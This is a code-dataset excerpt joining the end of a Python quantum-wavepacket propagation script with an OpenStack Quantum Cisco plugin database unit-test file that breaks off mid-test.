outputFilereadme = os.path.join(nameRoot, 'README')
with open(outputFilereadme, "w") as oofRR:
oofRR.write(inputDict['readme'])
print('file readme written')
# calculating initial total/potential/kinetic
kin, pot, pul, absS = CEnergy(t,wf,inp)
kinetic = np.vdot(wf,kin)
potential = np.vdot(wf,pot)
pulse_interaction = np.vdot(wf,pul)
initialTotal = kinetic + potential + pulse_interaction
inp['initialTotal'] = initialTotal.real
# to give the graph a nice range
inp['vmax_value'] = abs2(wf).max()
# graph the pulse
graphic_Pulse(inp)
# saving input data in h5 file
dataH5filename = os.path.join(nameRoot, 'allInput.h5')
writeH5fileDict(dataH5filename,inp)
# print top of table
header = ' Coun | step N | fs | NORM devia. | Kin. Energy | Pot. Energy | Total Energy | Tot devia. | Pulse_Inter. | Pulse X | Pulse Y | Pulse Z | Norm Loss |'
bar = ('-' * (len(header)))
print('Energies in ElectronVolt \n{}\n{}\n{}'.format(bar,header,bar))
for ii in range(fulltimeSteps):
if (ii % deltasGraph) == 0 or ii==fulltimeSteps-1:
# async is awesome. But it is not needed in 1d and maybe in 2d.
            if kind == '3d':
asyncFun(doAsyncStuffs,wf,t,ii,inp,inputDict,counter,outputFile,outputFileP,outputFileA,CEnergy)
else:
doAsyncStuffs(wf,t,ii,inp,inputDict,counter,outputFile,outputFileP,outputFileA,CEnergy)
counter += 1
wf = Crk4Ene3d(Cpropagator,t,wf,inp)
t = t + dt
def restart_propagation(inp,inputDict):
'''
This function restarts a propagation that has been stopped
'''
import glob
nameRoot = inputDict['outFol']
list_wave_h5 = sorted(glob.glob(nameRoot + '/Gaussian*.h5'))
last_wave_h5 = list_wave_h5[-1]
wf = retrieve_hdf5_data(last_wave_h5,'WF')
t = retrieve_hdf5_data(last_wave_h5,'Time')[1] # [1] is atomic units
kind = inp['kind']
deltasGraph = inputDict['deltasGraph']
counter = len(list_wave_h5) - 1
dt = inputDict['dt']
fulltime = inputDict['fullTime']
fulltimeSteps = int(fulltime/dt)
outputFile = os.path.join(nameRoot, 'output')
outputFileP = os.path.join(nameRoot, 'outputPopul')
outputFileA = os.path.join(nameRoot, 'Output_Abs')
if (inputDict['fullTime'] == inp['fullTime']):
good('Safe restart with same fulltime')
#h5_data_file = os.path.join(nameRoot,'allInput.h5')
else:
h5_data_file = os.path.join(nameRoot,'allInput.h5')
dict_all_data = readWholeH5toDict(h5_data_file)
dict_all_data['fullTime'] = inputDict['fullTime']
writeH5fileDict(h5_data_file, dict_all_data)
good('different fullTime detected and allInput updated')
print('\ntail -f {}\n'.format(outputFileP))
CEnergy, Cpropagator = select_propagator(kind)
good('Cpropagator version: {}'.format(version_Cpropagator()))
ii_initial = counter * deltasGraph
print('I will do {} more steps.\n'.format(fulltimeSteps-ii_initial))
if True:
print('Calculation restart forced on me... I assume you did everything you need')
else:
warning('Did you restart this from a finished calculation?')
strout = "rm {}\nsed -i '$ d' {}\nsed -i '$ d' {}\n"
print(strout.format(last_wave_h5,outputFile,outputFileP))
input("Press Enter to continue...")
strOUT = '{} {} {}'.format(ii_initial,counter,fulltimeSteps)
good(strOUT)
for ii in range(ii_initial,fulltimeSteps):
#print('ii = {}'.format(ii))
if ((ii % deltasGraph) == 0 or ii==fulltimeSteps-1):
# async is awesome. But it is not needed in 1d and maybe in 2d.
            if kind == '3d':
asyncFun(doAsyncStuffs,wf,t,ii,inp,inputDict,counter,outputFile,outputFileP,outputFileA,CEnergy)
else:
doAsyncStuffs(wf,t,ii,inp,inputDict,counter,outputFile,outputFileP,outputFileA,CEnergy)
counter += 1
wf = Crk4Ene3d(Cpropagator,t,wf,inp)
t = t + dt
def doAsyncStuffs(wf,t,ii,inp,inputDict,counter,outputFile,outputFileP,outputFileA,CEnergy):
nameRoot = inputDict['outFol']
nstates = inp['nstates']
name = os.path.join(nameRoot, 'Gaussian' + '{:04}'.format(counter))
h5name = name + ".h5"
writeH5file(h5name,[("WF", wf),("Time", [t*0.02418884,t])])
time1 = datetime.datetime.now()
kin, pot, pul, absS = CEnergy(t,wf,inp)
time2 = datetime.datetime.now()
#print(time2-time1)
kinetic = np.vdot(wf,kin)
potential = np.vdot(wf,pot)
pulse_interaction = np.vdot(wf,pul)
absorbing_potential = np.vdot(wf,absS)
#print(absorbing_potential)
    # This is the norm loss due to the CAP (complex absorbing potential); it needs to be multiplied by -2i (as discussed with Stephan).
absorbing_potential_thing = np.real(-2j * absorbing_potential)
#print(absorbing_potential_thing)
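    # Sketch of the -2i bookkeeping, assuming the usual CAP convention where
    # the Hamiltonian is H = H0 - i*W with W real and absS holding the CAP
    # term applied to wf: from i*d(psi)/dt = H*psi it follows that
    #   d/dt <psi|psi> = -2 <psi|W|psi>
    # i.e. the norm decays at twice the CAP expectation value, which is what
    # np.real(-2j * np.vdot(wf, absS)) evaluates above.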
total = kinetic + potential + pulse_interaction
initialTotal = inp['initialTotal']
norm_wf = np.linalg.norm(wf)
## you wanted to print the header when the table goes off screen... this is why you get the rows number
#rows, _ = os.popen('stty size', 'r').read().split()
#if int(rows) // counter == 0:
# print('zero')
outputStringS = ' {:04d} |{:10d} |{:11.4f} | {:+e} | {:+7.5e} | {:+7.5e} | {:+7.5e} | {:+7.5e} | {:+7.5e} | {:+10.3e} | {:+10.3e} | {:+10.3e} | {:+10.3e} |'
outputString = outputStringS.format(counter,
ii,
t*0.02418884,
1-norm_wf,
fromHartoEv(kinetic.real),
fromHartoEv(potential.real),
fromHartoEv(total.real),
fromHartoEv(initialTotal - total.real),
fromHartoEv(pulse_interaction.real),
pulZe(t,inp['pulseX']),
pulZe(t,inp['pulseY']),
pulZe(t,inp['pulseZ']),
absorbing_potential_thing)
print(outputString)
kind = inp['kind']
outputStringSP = "{:11.4f}".format(t/41.3)
outputStringA = "{:11.4f} {:+7.5e}".format(t,absorbing_potential_thing)
for i in range(nstates):
if kind == '3d':
singleStatewf = wf[:,:,:,i]
singleAbspote = absS[:,:,:,i]
norm_loss_this_step = np.real(-2j * np.vdot(singleStatewf,singleAbspote))
if kind == 'GamThe':
singleStatewf = wf[:,:,i]
elif kind == 'Phi' or kind == 'Gam' or kind == 'The':
singleStatewf = wf[:,i]
outputStringA += " {:+7.5e} ".format(norm_loss_this_step)
outputStringSP += " {:+7.5e} ".format(np.linalg.norm(singleStatewf)**2)
with open(outputFileA, "a") as oofA:
oofA.write(outputStringA + '\n')
with open(outputFileP, "a") as oofP:
oofP.write(outputStringSP + '\n')
with open(outputFile, "a") as oof:
outputStringS2 = '{} {} {} {} {} {} {} {} {} {} {} {}'
outputString2 = outputStringS2.format(counter,ii,t/41.3,1-norm_wf,fromHartoEv(kinetic.real),fromHartoEv(potential.real),fromHartoEv(total.real),fromHartoEv(initialTotal - total.real), pulZe(t,inp['pulseX']), pulZe(t,inp['pulseY']), pulZe(t,inp['pulseZ']), absorbing_potential_thing)
oof.write(outputString2 + '\n')
#####################
# on the fly graphs #
#####################
if 'graphs' in inputDict:
vmaxV = inp['vmax_value']
# I am sure there is a better way to do this...
if kind == 'Phi':
valuesX = inp['phis']
label = 'Phi {:11.4f}'.format(t/41.3)
elif kind == 'Gam':
valuesX = inp['gams']
label = 'Gam {:11.4f}'.format(t/41.3)
pot=inp['potCube'][0]
elif kind == 'The':
valuesX = inp['thes']
label = 'The {:11.4f}'.format(t/41.3)
if kind == 'Phi' or kind == 'Gam' or kind == 'The':
graphFileName = name + ".png"
makeJustAnother2DgraphComplexSINGLE(valuesX,wf,graphFileName,label)
if kind == 'GamThe':
for i in range(nstates):
for j in range(i+1): # In python the handshakes are like this...
graphFileName = '{}_state_{}_{}.png'.format(name,i,j)
heatMap2dWavefunction(wf[:,:,i],wf[:,:,j],graphFileName,t/41.3,vmaxV)
def forcehere(vec,ind,h=None):
'''
    calculates the numerical second derivative (force constant) of vec at index ind
    vec :: np.array(double)
    ind :: Int
    h :: Double <- grid spacing
'''
    if h is None:
warning('dimensionality is not clear')
h = 1
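    # Fourth-order central five-point stencil for the second derivative
    # (exactly what the expression below evaluates):
    #   f''(x_i) ~= (-f[i-2] + 16*f[i-1] - 30*f[i] + 16*f[i+1] - f[i+2]) / (12*h**2)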
num = (-vec[ind-2]+16*vec[ind-1]-30*vec[ind]+16*vec[ind+1]-vec[ind+2])
denom = 12 * h**2
return(num/denom)
def initialCondition3d(wf, dataDict, factor=None, displ=None, init_mom=None):
'''
    calculates the initial-condition wavefunction (WF)
wf :: np.array(phiL,gamL,theL) Complex
datadict :: Dictionary {}
'''
good('Initial condition printing')
# Take equilibrium points
#gsm_phi_ind = dataDict['phis'].index('P000-000')
#gsm_gam_ind = dataDict['gams'].index('P016-923')
#gsm_the_ind = dataDict['thes'].index('P114-804')
gsm_phi_ind = 29
gsm_gam_ind = 28
gsm_the_ind = 55
warning('Equilibrium points put by hand: {} {} {}'.format(gsm_phi_ind,gsm_gam_ind,gsm_the_ind))
# Take values array from labels
phis,gams,thes = fromLabelsToFloats(dataDict)
# take step
dphi = phis[0] - phis[1]
dgam = gams[0] - gams[1]
dthe = thes[0] - thes[1]
# take range
range_phi = phis[-1] - phis[0]
range_gam = gams[-1] - gams[0]
range_the = thes[-1] - thes[0]
# slice out the parabolas at equilibrium geometry
pot = dataDict['potCube']
parabola_phi = pot[:,gsm_gam_ind,gsm_the_ind,0]
parabola_gam = pot[gsm_phi_ind,:,gsm_the_ind,0]
parabola_the = pot[gsm_phi_ind,gsm_gam_ind,:,0]
# calculate force with finite difference # WATCH OUT RADIANS AND ANGLES HERE
force_phi = forcehere(parabola_phi, gsm_phi_ind, h=dphi)
force_gam = forcehere(parabola_gam, gsm_gam_ind, h=dgam)
force_the = forcehere(parabola_the, gsm_the_ind, h=dthe)
# Now, I want the coefficients of the second derivative of the kinetic energy jacobian
# for the equilibrium geometry, so that I can calculate the gaussian.
# in the diagonal approximation those are the diagonal elements, thus element 0,4,8.
coe_phi = dataDict['kinCube'][gsm_phi_ind,gsm_gam_ind,gsm_the_ind,0,2]
coe_gam = dataDict['kinCube'][gsm_phi_ind,gsm_gam_ind,gsm_the_ind,4,2]
# these three lines are here because we wanted to debug Gamma
#coe_gam = dataDict['kinCube'][gsm_phi_ind,gsm_gam_ind,gsm_the_ind,0,2]
#warning('coe_gam has been changed !!! in initialcondition function')
coe_the = dataDict['kinCube'][gsm_phi_ind,gsm_gam_ind,gsm_the_ind,8,2]
    # they need to be multiplied by (-2 * hbar**2), where hbar is 1, and inverted,
    # because the mass is in the denominator and we actually want the mass itself.
G_phi = 1 / ( -2 * coe_phi )
G_gam = 1 / ( -2 * coe_gam )
G_the = 1 / ( -2 * coe_the )
    # factor is just to widen the gaussian a little bit; leave it at one.
factor = factor or 1
if factor != 1:
warning('You have a factor of {} enabled on initial condition'.format(factor))
G_phi = G_phi/factor
G_gam = G_gam/factor
G_the = G_the/factor
Gw_phi = np.sqrt(force_phi*G_phi)
Gw_gam = np.sqrt(force_gam*G_gam)
Gw_the = np.sqrt(force_the*G_the)
w_phi = np.sqrt(force_phi/G_phi)
w_gam = np.sqrt(force_gam/G_gam)
w_the = np.sqrt(force_the/G_the)
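    # Harmonic-oscillator bookkeeping (a sketch of the relations used here):
    # coe_* multiplies d^2/dq^2 in the kinetic operator, i.e. coe = -hbar**2/(2m),
    # so G_* = 1/(-2*coe_*) plays the role of the mass m. With force_* as the
    # force constant k, this gives
    #   w_*  = sqrt(k/m)          (angular frequency)
    #   Gw_* = sqrt(k*m) = m*w_*  (gaussian width parameter passed to gaussian2)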
# displacements from equilibrium geometry
displ = displ or (0,0,0)
displPhi,displGam,displThe = displ
if displPhi != 0 or displGam != 0 or displThe != 0:
warning('Some displacements activated | Phi {} | Gam {} | The {}'.format(displPhi,displGam,displThe))
phi0 = phis[displPhi]
gam0 = gams[displGam]
the0 = thes[displThe]
    # initial momenta?
init_mom = init_mom or (0, 0, 0)
init_momPhi, init_momGam, init_momThe = init_mom
if init_momPhi != 0 or init_momGam != 0 or init_momThe != 0:
        warning('Some initial momentum is activated | Phi {} | Gam {} | The {}'.format(init_momPhi,init_momGam,init_momThe))
for p, phi in enumerate(phis):
phiV = gaussian2(phi, phi0, Gw_phi, init_momPhi)
for g, gam in enumerate(gams):
gamV = gaussian2(gam, gam0, Gw_gam, init_momGam)
for t , the in enumerate(thes):
theV = gaussian2(the, the0, Gw_the, init_momThe)
#print('I: {}\tV: {}\tZ: {}\tG: {}\t'.format(t,the,the0,theV))
wf[p,g,t] = phiV * gamV * theV
norm_wf = np.linalg.norm(wf)
print('NORM before normalization: {:e}'.format(norm_wf))
print('Steps: phi({:.3f}) gam({:.3f}) the({:.3f})'.format(dphi,dgam,dthe))
print('Range: phi({:.3f}) gam({:.3f}) the({:.3f})'.format(range_phi,range_gam,range_the))
wf = wf / norm_wf
print(wf.shape)
print('\n\nparabola force constant: {:e} {:e} {:e}'.format(force_phi,force_gam,force_the))
print('values on Jacobian 2nd derivative: {:e} {:e} {:e}'.format(coe_phi,coe_gam,coe_the))
print('G: {:e} {:e} {:e}'.format(G_phi,G_gam,G_the))
print('Gw: {:e} {:e} {:e}'.format(Gw_phi,Gw_gam,Gw_the))
print('w: {:e} {:e} {:e}'.format(w_phi,w_gam,w_the))
print('cm-1: {:e} {:e} {:e}'.format(fromHartreetoCmMin1(w_phi),
fromHartreetoCmMin1(w_gam),
fromHartreetoCmMin1(w_the)))
print('fs: {:e} {:e} {:e}'.format(fromCmMin1toFs(w_phi),
fromCmMin1toFs(w_gam),
fromCmMin1toFs(w_the)))
return(wf)
def main():
fn1 = '/home/alessio/Desktop/a-3dScanSashaSupport/n-Propagation/input.yml'
inputAU = bring_input_to_AU(loadInputYAML(fn1))
if 'dataFile' in inputAU:
name_data_file = inputAU['dataFile']
        # LAUNCH THE PROPAGATION
if name_data_file[-3:] == 'npy':
data = np.load(name_data_file)
# [()] <- because np.load returns a numpy wrapper on the dictionary
dictionary_data = data[()]
propagate3D(dictionary_data, inputAU)
elif name_data_file[-3:] == 'kle':
with open(name_data_file, "rb") as input_file:
dictionary_data = pickle.load(input_file)
propagate3D(dictionary_data, inputAU)
if __name__ == "__main__":
import cProfile
cProfile.run('main()', sort='time')
| gpl-3.0 | 6,964,923,245,122,360,000 | 41.016349 | 328 | 0.576621 | false |
yamt/neutron | quantum/plugins/cisco/tests/unit/test_database.py | 1 | 25556 | # vim: tabstop=4 shiftwidth=4 softtabstop=4
# Copyright 2011, Cisco Systems, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
# @author: Rohit Agarwalla, Cisco Systems, Inc.
"""
test_database.py is an independent test suite
that tests the database api method calls
"""
from quantum.openstack.common import log as logging
import quantum.plugins.cisco.db.api as db
import quantum.plugins.cisco.db.l2network_db as l2network_db
import quantum.plugins.cisco.db.nexus_db_v2 as nexus_db
from quantum.tests import base
LOG = logging.getLogger(__name__)
class NexusDB(object):
"""Class consisting of methods to call nexus db methods."""
def get_all_nexusportbindings(self):
"""Get all nexus port bindings."""
bindings = []
try:
for bind in nexus_db.get_all_nexusport_bindings():
LOG.debug("Getting nexus port binding : %s" % bind.port_id)
bind_dict = {}
bind_dict["port-id"] = str(bind.port_id)
bind_dict["vlan-id"] = str(bind.vlan_id)
bindings.append(bind_dict)
except Exception as exc:
LOG.error("Failed to get all bindings: %s" % str(exc))
return bindings
def get_nexusportbinding(self, vlan_id):
"""Get nexus port binding."""
binding = []
try:
for bind in nexus_db.get_nexusport_binding(vlan_id):
LOG.debug("Getting nexus port binding : %s" % bind.port_id)
bind_dict = {}
bind_dict["port-id"] = str(bind.port_id)
bind_dict["vlan-id"] = str(bind.vlan_id)
binding.append(bind_dict)
except Exception as exc:
LOG.error("Failed to get all bindings: %s" % str(exc))
return binding
def create_nexusportbinding(self, port_id, vlan_id):
"""Create nexus port binding."""
bind_dict = {}
try:
res = nexus_db.add_nexusport_binding(port_id, vlan_id)
LOG.debug("Created nexus port binding : %s" % res.port_id)
bind_dict["port-id"] = str(res.port_id)
bind_dict["vlan-id"] = str(res.vlan_id)
return bind_dict
except Exception as exc:
LOG.error("Failed to create nexus binding: %s" % str(exc))
def delete_nexusportbinding(self, vlan_id):
"""Delete nexus port binding."""
bindings = []
try:
bind = nexus_db.remove_nexusport_binding(vlan_id)
for res in bind:
LOG.debug("Deleted nexus port binding: %s" % res.vlan_id)
bind_dict = {}
bind_dict["port-id"] = res.port_id
bindings.append(bind_dict)
return bindings
except Exception as exc:
raise Exception("Failed to delete nexus port binding: %s"
% str(exc))
def update_nexusport_binding(self, port_id, new_vlan_id):
"""Update nexus port binding."""
try:
res = nexus_db.update_nexusport_binding(port_id, new_vlan_id)
LOG.debug("Updating nexus port binding : %s" % res.port_id)
bind_dict = {}
bind_dict["port-id"] = str(res.port_id)
bind_dict["vlan-id"] = str(res.vlan_id)
return bind_dict
except Exception as exc:
raise Exception("Failed to update nexus port binding vnic: %s"
% str(exc))
class L2networkDB(object):
"""Class conisting of methods to call L2network db methods."""
def get_all_vlan_bindings(self):
"""Get all vlan binding into a list of dict."""
vlans = []
try:
for vlan_bind in l2network_db.get_all_vlan_bindings():
LOG.debug("Getting vlan bindings for vlan: %s" %
vlan_bind.vlan_id)
vlan_dict = {}
vlan_dict["vlan-id"] = str(vlan_bind.vlan_id)
vlan_dict["vlan-name"] = vlan_bind.vlan_name
vlan_dict["net-id"] = str(vlan_bind.network_id)
vlans.append(vlan_dict)
except Exception as exc:
LOG.error("Failed to get all vlan bindings: %s" % str(exc))
return vlans
def get_vlan_binding(self, network_id):
"""Get a vlan binding."""
vlan = []
try:
for vlan_bind in l2network_db.get_vlan_binding(network_id):
LOG.debug("Getting vlan binding for vlan: %s" %
vlan_bind.vlan_id)
vlan_dict = {}
vlan_dict["vlan-id"] = str(vlan_bind.vlan_id)
vlan_dict["vlan-name"] = vlan_bind.vlan_name
vlan_dict["net-id"] = str(vlan_bind.network_id)
vlan.append(vlan_dict)
except Exception as exc:
LOG.error("Failed to get vlan binding: %s" % str(exc))
return vlan
def create_vlan_binding(self, vlan_id, vlan_name, network_id):
"""Create a vlan binding."""
vlan_dict = {}
try:
res = l2network_db.add_vlan_binding(vlan_id, vlan_name, network_id)
LOG.debug("Created vlan binding for vlan: %s" % res.vlan_id)
vlan_dict["vlan-id"] = str(res.vlan_id)
vlan_dict["vlan-name"] = res.vlan_name
vlan_dict["net-id"] = str(res.network_id)
return vlan_dict
except Exception as exc:
LOG.error("Failed to create vlan binding: %s" % str(exc))
def delete_vlan_binding(self, network_id):
"""Delete a vlan binding."""
try:
res = l2network_db.remove_vlan_binding(network_id)
LOG.debug("Deleted vlan binding for vlan: %s" % res.vlan_id)
vlan_dict = {}
vlan_dict["vlan-id"] = str(res.vlan_id)
return vlan_dict
except Exception as exc:
raise Exception("Failed to delete vlan binding: %s" % str(exc))
def update_vlan_binding(self, network_id, vlan_id, vlan_name):
"""Update a vlan binding."""
try:
res = l2network_db.update_vlan_binding(network_id, vlan_id,
vlan_name)
LOG.debug("Updating vlan binding for vlan: %s" % res.vlan_id)
vlan_dict = {}
vlan_dict["vlan-id"] = str(res.vlan_id)
vlan_dict["vlan-name"] = res.vlan_name
vlan_dict["net-id"] = str(res.network_id)
return vlan_dict
except Exception as exc:
raise Exception("Failed to update vlan binding: %s" % str(exc))
class QuantumDB(object):
"""Class conisting of methods to call Quantum db methods."""
def get_all_networks(self, tenant_id):
"""Get all networks."""
nets = []
try:
for net in db.network_list(tenant_id):
LOG.debug("Getting network: %s" % net.uuid)
net_dict = {}
net_dict["tenant-id"] = net.tenant_id
net_dict["net-id"] = str(net.uuid)
net_dict["net-name"] = net.name
nets.append(net_dict)
except Exception as exc:
LOG.error("Failed to get all networks: %s" % str(exc))
return nets
def get_network(self, network_id):
"""Get a network."""
        net_list = []
        try:
            for net in db.network_get(network_id):
                LOG.debug("Getting network: %s" % net.uuid)
                net_dict = {}
                net_dict["tenant-id"] = net.tenant_id
                net_dict["net-id"] = str(net.uuid)
                net_dict["net-name"] = net.name
                # append to the result list, not to the shadowed row object
                net_list.append(net_dict)
        except Exception as exc:
            LOG.error("Failed to get network: %s" % str(exc))
        return net_list
def create_network(self, tenant_id, net_name):
"""Create a network."""
net_dict = {}
try:
res = db.network_create(tenant_id, net_name)
LOG.debug("Created network: %s" % res.uuid)
net_dict["tenant-id"] = res.tenant_id
net_dict["net-id"] = str(res.uuid)
net_dict["net-name"] = res.name
return net_dict
except Exception as exc:
LOG.error("Failed to create network: %s" % str(exc))
def delete_network(self, net_id):
"""Delete a network."""
try:
net = db.network_destroy(net_id)
LOG.debug("Deleted network: %s" % net.uuid)
net_dict = {}
net_dict["net-id"] = str(net.uuid)
return net_dict
except Exception as exc:
raise Exception("Failed to delete port: %s" % str(exc))
def update_network(self, tenant_id, net_id, **kwargs):
"""Update a network."""
try:
net = db.network_update(net_id, tenant_id, **kwargs)
LOG.debug("Updated network: %s" % net.uuid)
net_dict = {}
net_dict["net-id"] = str(net.uuid)
net_dict["net-name"] = net.name
return net_dict
except Exception as exc:
raise Exception("Failed to update network: %s" % str(exc))
def get_all_ports(self, net_id):
"""Get all ports."""
ports = []
try:
for port in db.port_list(net_id):
LOG.debug("Getting port: %s" % port.uuid)
port_dict = {}
port_dict["port-id"] = str(port.uuid)
port_dict["net-id"] = str(port.network_id)
port_dict["int-id"] = port.interface_id
port_dict["state"] = port.state
port_dict["net"] = port.network
ports.append(port_dict)
return ports
except Exception as exc:
LOG.error("Failed to get all ports: %s" % str(exc))
def get_port(self, net_id, port_id):
"""Get a port."""
port_list = []
port = db.port_get(net_id, port_id)
try:
LOG.debug("Getting port: %s" % port.uuid)
port_dict = {}
port_dict["port-id"] = str(port.uuid)
port_dict["net-id"] = str(port.network_id)
port_dict["int-id"] = port.interface_id
port_dict["state"] = port.state
port_list.append(port_dict)
return port_list
except Exception as exc:
LOG.error("Failed to get port: %s" % str(exc))
def create_port(self, net_id):
"""Add a port."""
port_dict = {}
try:
port = db.port_create(net_id)
LOG.debug("Creating port %s" % port.uuid)
port_dict["port-id"] = str(port.uuid)
port_dict["net-id"] = str(port.network_id)
port_dict["int-id"] = port.interface_id
port_dict["state"] = port.state
return port_dict
except Exception as exc:
LOG.error("Failed to create port: %s" % str(exc))
def delete_port(self, net_id, port_id):
"""Delete a port."""
try:
port = db.port_destroy(net_id, port_id)
LOG.debug("Deleted port %s" % port.uuid)
port_dict = {}
port_dict["port-id"] = str(port.uuid)
return port_dict
except Exception as exc:
raise Exception("Failed to delete port: %s" % str(exc))
def update_port(self, net_id, port_id, port_state):
"""Update a port."""
try:
port = db.port_set_state(net_id, port_id, port_state)
LOG.debug("Updated port %s" % port.uuid)
port_dict = {}
port_dict["port-id"] = str(port.uuid)
port_dict["net-id"] = str(port.network_id)
port_dict["int-id"] = port.interface_id
port_dict["state"] = port.state
return port_dict
except Exception as exc:
raise Exception("Failed to update port state: %s" % str(exc))
def plug_interface(self, net_id, port_id, int_id):
"""Plug interface to a port."""
try:
port = db.port_set_attachment(net_id, port_id, int_id)
LOG.debug("Attached interface to port %s" % port.uuid)
port_dict = {}
port_dict["port-id"] = str(port.uuid)
port_dict["net-id"] = str(port.network_id)
port_dict["int-id"] = port.interface_id
port_dict["state"] = port.state
return port_dict
except Exception as exc:
raise Exception("Failed to plug interface: %s" % str(exc))
def unplug_interface(self, net_id, port_id):
"""Unplug interface to a port."""
try:
port = db.port_unset_attachment(net_id, port_id)
LOG.debug("Detached interface from port %s" % port.uuid)
port_dict = {}
port_dict["port-id"] = str(port.uuid)
port_dict["net-id"] = str(port.network_id)
port_dict["int-id"] = port.interface_id
port_dict["state"] = port.state
return port_dict
except Exception as exc:
raise Exception("Failed to unplug interface: %s" % str(exc))
class NexusDBTest(base.BaseTestCase):
"""Class conisting of nexus DB unit tests."""
def setUp(self):
        """Setup for nexus db tests."""
        super(NexusDBTest, self).setUp()
l2network_db.initialize()
self.addCleanup(db.clear_db)
self.dbtest = NexusDB()
LOG.debug("Setup")
def testa_create_nexusportbinding(self):
"""Create nexus port binding."""
binding1 = self.dbtest.create_nexusportbinding("port1", 10)
self.assertTrue(binding1["port-id"] == "port1")
self.tearDown_nexusportbinding()
def testb_getall_nexusportbindings(self):
"""Get all nexus port bindings."""
self.dbtest.create_nexusportbinding("port1", 10)
self.dbtest.create_nexusportbinding("port2", 10)
bindings = self.dbtest.get_all_nexusportbindings()
count = 0
for bind in bindings:
if "port" in bind["port-id"]:
count += 1
self.assertTrue(count == 2)
self.tearDown_nexusportbinding()
def testc_delete_nexusportbinding(self):
"""Delete nexus port binding."""
self.dbtest.create_nexusportbinding("port1", 10)
self.dbtest.delete_nexusportbinding(10)
bindings = self.dbtest.get_all_nexusportbindings()
count = 0
for bind in bindings:
if "port " in bind["port-id"]:
count += 1
self.assertTrue(count == 0)
self.tearDown_nexusportbinding()
def testd_update_nexusportbinding(self):
"""Update nexus port binding."""
binding1 = self.dbtest.create_nexusportbinding("port1", 10)
binding1 = self.dbtest.update_nexusport_binding(binding1["port-id"],
20)
bindings = self.dbtest.get_all_nexusportbindings()
count = 0
for bind in bindings:
if "20" in str(bind["vlan-id"]):
count += 1
self.assertTrue(count == 1)
self.tearDown_nexusportbinding()
def tearDown_nexusportbinding(self):
"""Tear down nexus port binding table."""
LOG.debug("Tearing Down Nexus port Bindings")
binds = self.dbtest.get_all_nexusportbindings()
for bind in binds:
vlan_id = bind["vlan-id"]
self.dbtest.delete_nexusportbinding(vlan_id)
class L2networkDBTest(base.BaseTestCase):
"""Class conisting of L2network DB unit tests."""
def setUp(self):
"""Setup for tests."""
super(L2networkDBTest, self).setUp()
l2network_db.initialize()
self.dbtest = L2networkDB()
self.quantum = QuantumDB()
self.addCleanup(db.clear_db)
LOG.debug("Setup")
def testa_create_vlanbinding(self):
"""Test add vlan binding."""
net1 = self.quantum.create_network("t1", "netid1")
vlan1 = self.dbtest.create_vlan_binding(10, "vlan1", net1["net-id"])
self.assertTrue(vlan1["vlan-id"] == "10")
self.teardown_vlanbinding()
self.teardown_network()
def testb_getall_vlanbindings(self):
"""Test get all vlan bindings."""
net1 = self.quantum.create_network("t1", "netid1")
net2 = self.quantum.create_network("t1", "netid2")
vlan1 = self.dbtest.create_vlan_binding(10, "vlan1", net1["net-id"])
self.assertTrue(vlan1["vlan-id"] == "10")
vlan2 = self.dbtest.create_vlan_binding(20, "vlan2", net2["net-id"])
self.assertTrue(vlan2["vlan-id"] == "20")
vlans = self.dbtest.get_all_vlan_bindings()
count = 0
for vlan in vlans:
if "vlan" in vlan["vlan-name"]:
count += 1
self.assertTrue(count == 2)
self.teardown_vlanbinding()
self.teardown_network()
def testc_delete_vlanbinding(self):
"""Test delete vlan binding."""
net1 = self.quantum.create_network("t1", "netid1")
vlan1 = self.dbtest.create_vlan_binding(10, "vlan1", net1["net-id"])
self.assertTrue(vlan1["vlan-id"] == "10")
self.dbtest.delete_vlan_binding(net1["net-id"])
vlans = self.dbtest.get_all_vlan_bindings()
count = 0
for vlan in vlans:
if "vlan " in vlan["vlan-name"]:
count += 1
self.assertTrue(count == 0)
self.teardown_vlanbinding()
self.teardown_network()
def testd_update_vlanbinding(self):
"""Test update vlan binding."""
net1 = self.quantum.create_network("t1", "netid1")
vlan1 = self.dbtest.create_vlan_binding(10, "vlan1", net1["net-id"])
self.assertTrue(vlan1["vlan-id"] == "10")
vlan1 = self.dbtest.update_vlan_binding(net1["net-id"], 11, "newvlan1")
vlans = self.dbtest.get_all_vlan_bindings()
count = 0
for vlan in vlans:
if "new" in vlan["vlan-name"]:
count += 1
self.assertTrue(count == 1)
self.teardown_vlanbinding()
self.teardown_network()
def testm_test_vlanids(self):
"""Test vlanid methods."""
l2network_db.create_vlanids()
vlanids = l2network_db.get_all_vlanids()
self.assertTrue(len(vlanids) > 0)
vlanid = l2network_db.reserve_vlanid()
used = l2network_db.is_vlanid_used(vlanid)
self.assertTrue(used)
used = l2network_db.release_vlanid(vlanid)
self.assertFalse(used)
#counting on default teardown here to clear db
def teardown_network(self):
"""tearDown Network table."""
LOG.debug("Tearing Down Network")
nets = self.quantum.get_all_networks("t1")
for net in nets:
netid = net["net-id"]
self.quantum.delete_network(netid)
def teardown_port(self):
"""tearDown Port table."""
LOG.debug("Tearing Down Port")
nets = self.quantum.get_all_networks("t1")
for net in nets:
netid = net["net-id"]
ports = self.quantum.get_all_ports(netid)
for port in ports:
portid = port["port-id"]
self.quantum.delete_port(netid, portid)
def teardown_vlanbinding(self):
"""tearDown VlanBinding table."""
LOG.debug("Tearing Down Vlan Binding")
vlans = self.dbtest.get_all_vlan_bindings()
for vlan in vlans:
netid = vlan["net-id"]
self.dbtest.delete_vlan_binding(netid)
class QuantumDBTest(base.BaseTestCase):
"""Class conisting of Quantum DB unit tests."""
def setUp(self):
"""Setup for tests."""
super(QuantumDBTest, self).setUp()
l2network_db.initialize()
self.addCleanup(db.clear_db)
self.dbtest = QuantumDB()
self.tenant_id = "t1"
LOG.debug("Setup")
def testa_create_network(self):
"""Test to create network."""
net1 = self.dbtest.create_network(self.tenant_id, "plugin_test1")
self.assertTrue(net1["net-name"] == "plugin_test1")
self.teardown_network_port()
def testb_get_networks(self):
"""Test to get all networks."""
net1 = self.dbtest.create_network(self.tenant_id, "plugin_test1")
self.assertTrue(net1["net-name"] == "plugin_test1")
net2 = self.dbtest.create_network(self.tenant_id, "plugin_test2")
self.assertTrue(net2["net-name"] == "plugin_test2")
nets = self.dbtest.get_all_networks(self.tenant_id)
count = 0
for net in nets:
